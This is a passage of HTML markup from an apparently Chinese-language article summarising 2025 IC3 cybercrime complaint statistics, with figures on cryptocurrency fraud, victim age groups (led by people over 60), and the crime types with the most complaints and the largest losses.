Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2537037037037037" data-type="png" data-w="1080" height="119" style="margin-left:0px;margin-top:0px;width:572px;height:145px;" width="470" data-imgfileid="100021037" src="https://wechat2rss.xlab.app/img-proxy/?k=bab09f39&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCJKDMpKZiaAppFQGJkxAJHn49FibD0IMCvFv6Ljppiau5JMKF0ickKxvWcczuGJtoR9Rd0NqFXTPSF2l2xhB2R1KlibWBbT0oHRicibIw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">2. 加密货币的相关情况</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">加密货币相关投诉共计 181,565 起，累计造成损失 113.66 亿美元，较 2024 年增长 22%。其中，18,589 名投资者的损失超过 10 万美元。在所有投诉者中，60 岁以上群体占比最高。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-backh="476" data-backw="437" data-imgfileid="100021036" data-ratio="1.089820359281437" width="437" data-type="png" data-w="1002" height="476" style="margin-left:0px;margin-top:0px;width:518px;height:565px;" src="https://wechat2rss.xlab.app/img-proxy/?k=e2ed097f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCIl2l3TNkFyRxTyXm0tdxe0rJ5A4bAZwMH7dfAP5eQTuvoNI8QmdygxrZYJfMdSBCR1WlMkIC9knqrAg1TaRgvljSECo8AwCUs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p></b></b></b></b></b></p><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h1 dir="ltr" style="line-height: 1.38;margin-top: 20pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 20pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">关键点二：受害</span></span><span leaf="" style="white-space: pre-wrap;font-size: 20pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">群体分析</span></span></h1><h2 dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">1. 总体</span></span><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">年龄分布</span></span></h2><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">60 岁以上：201,266 起投诉，损失约 77.5  亿美元。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">50-59 岁：124,820 起投诉，损失约 36.8  亿美元。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">40-49 岁：167,066 起投诉，损失约 29.6 亿美元。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">30-39 岁：153,293 起投诉，损失约 17.4  亿美元。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">20-29 岁：112,069 起投诉，损失约 5.6  亿美元。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">20 岁以下：31,254 起投诉，损失约 6,710 万美元。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021038" data-ratio="0.8697394789579158" width="482" data-type="png" data-w="998" height="418" style="margin-left:0px;margin-top:0px;width:560px;height:487px;" src="https://wechat2rss.xlab.app/img-proxy/?k=36531c3b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLuEfuweAxnwUXZyqjkowpr553AY7ZgIu59Jr6dDqjI5iaicKrTQv63UNgFm52GtZia7Uz4ZgvZx3S5ZcvjnoB6tyuib2ulvicqicOHQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">2. 加密货币受害群体</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在加密货币投资诈骗中，60 岁以上的群体投诉量最多（13,685 起），损失金额高达 27.6 亿美元，远超其他年龄段。这一群体同样在加密货币 ATM/Kiosk 诈骗中受害最深，相关投诉达 6,188 起，损失约 2.57 亿美元。由于对新兴金融技术和支付方式（如加密货币 ATM、二维码转账等）缺乏了解，加之防骗意识相对薄弱，60 岁以上人群成为诈骗分子的重点目标。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">值得注意的是，许多受害者在首次被骗后，又因轻信所谓“资金追回服务”而遭遇二次诈骗——在“追回骗局”(Recovery Scams) 中，该年龄段再次以 2,529 起投诉、损失超 5.4 亿美元的数据位居首位。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021039" data-ratio="1.3433395872420262" width="434" data-type="png" data-w="1066" height="583" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=075a3d82&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCINDKZdq3k3PbuicsS1trWibon1rO8aMtBnYuarwVthSWemZBp39lu5rChl9ib3uEOSX87LRGXMibAZ9IuVWhaZZT6qedSqiaicfPqro%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><h2 dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">3. 60 岁以上群体遭遇的主要诈骗类型</span></span></h2></b></b></b></b></b></p><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">投诉数量最多的诈骗类型：网络钓鱼 / 身份冒充、技术支持 / 客服诈骗、投资诈骗、个人数据泄露、情感/信任诈骗。</span></span></h2></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">损失最多的诈骗类型：投资诈骗、技术支持 / 客服诈骗、情感/信任诈骗、商业邮件诈骗(BEC)、冒充政府官员诈骗。</span></span></p></li></ul><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5787037037037037" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100021068" src="https://wechat2rss.xlab.app/img-proxy/?k=976f144c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCJpYpQg0y1icSLeIPgRricSlsxHASCUlrl6icx7ibtpuZ80fPjDoNAd1y2cU8hdVDficBibGz2LpPaGFaqNibbUQNgQdHJzELoHIRsPjc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h1 dir="ltr" style="line-height: 1.38;margin-top: 20pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 20pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">关键点三：犯罪类型分析</span></span></h1><p dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">1. 从投诉数量来看</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">网络钓鱼/电子欺骗：191,561 起。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">敲诈勒索：89,129 起。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">投资诈骗：72,984 起。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">个人数据泄露：67,456 起。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">未付款 / 未发货：56,478 起。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.2150537634408602" data-type="png" data-w="930" height="546" style="margin-left: 0px;margin-top: 0px;" width="449" data-imgfileid="100021043" src="https://wechat2rss.xlab.app/img-proxy/?k=82c2c593&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJSJvscOlDsf6u1KxuuKzVh8MqlNF0JYyiaZj6yq9iaPOJ3TVUzqkCvwat7q9icflwZFDdXZgEUpOvWia5tTLIYLicqKbyzvoHBqxyk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">2. 从损失金额来看</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">投资诈骗：约 86.49 亿美元。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">商业邮件诈骗(BEC)：约 30.47 亿美元。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">技术支持 / 客服诈骗：约 21.35 亿美元。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">个人数据泄露：约 13.15 亿美元。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">情感/信任诈骗：约  9.29 亿美元。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021044" data-ratio="1.2229166666666667" width="494" data-type="png" data-w="960" height="603" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=3c290bc8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJm4kjxPWa4lP2hu3QsBNft9KJHsAR4hIWytvmYDBOqgj0LmzcUibt1nqMvhdatCwQ3YzKOfx01ribPoUKD7607cLyPM7QU7dv3k%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">3. 加密货币相关犯罪</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">投诉最多：投资诈骗（61,559 起）、敲诈勒索（23,797 起）。</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">损失最大：投资诈骗（约 72.8 亿美元）、技术支持 / 客服诈骗（约 12.3 亿美元）。</span></span></p></li></ul><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100021069" data-ratio="0.4935185185185185" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=1781dafd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCKaved4Qib8yxlzuBKqe3EPFhxibeB5oNthRictqxIQx2KJUMfCibib0F7ABdI4iamO9hPubcr8f1AhNasME28Q6roQDfFbWmzNcLWx0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h1 dir="ltr" style="line-height: 1.38;margin-top: 20pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 20pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">关键点四：网络诈骗与执法成果</span></span></h1><h2 dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 16px;font-weight: bold;">1. 网络诈骗的整体情况</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2025 年，IC3 收到 452,868 起网络诈骗投诉，造成 176.97 亿美元损失，占全年总损失的 85%。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.29345794392523367" data-type="png" data-w="1070" height="176" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021046" src="https://wechat2rss.xlab.app/img-proxy/?k=f60cbe85&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKibIrhOicBbVpwpesQdaKHYTx0LLqjDgVm9DZnHWcKkjwMUWyg5lGUVUIEVL12IhJMFOroM1aIJajeXn9VEQgFMG8ciagpSQMmiaI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">投诉数量最多的交易类型包括加密货币、电汇 / ACH 转账、借记卡 / 信用卡、点对点转账、礼品卡/预付卡、支票/银行本票，以及现金。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9847036328871893" data-type="png" data-w="1046" height="555" style="margin-left: 0px;margin-top: 0px;" width="565" data-imgfileid="100021049" src="https://wechat2rss.xlab.app/img-proxy/?k=065f154c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCIOC7QPpL6ViaphTjvcibBuicrlvET5jAicJ9iabbPdOcU2uy67DLogg66Eg0O5icjiceZ9kjAk3PI7VtaG8aic1RgMCMLibqeH7DX8Vlb8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: 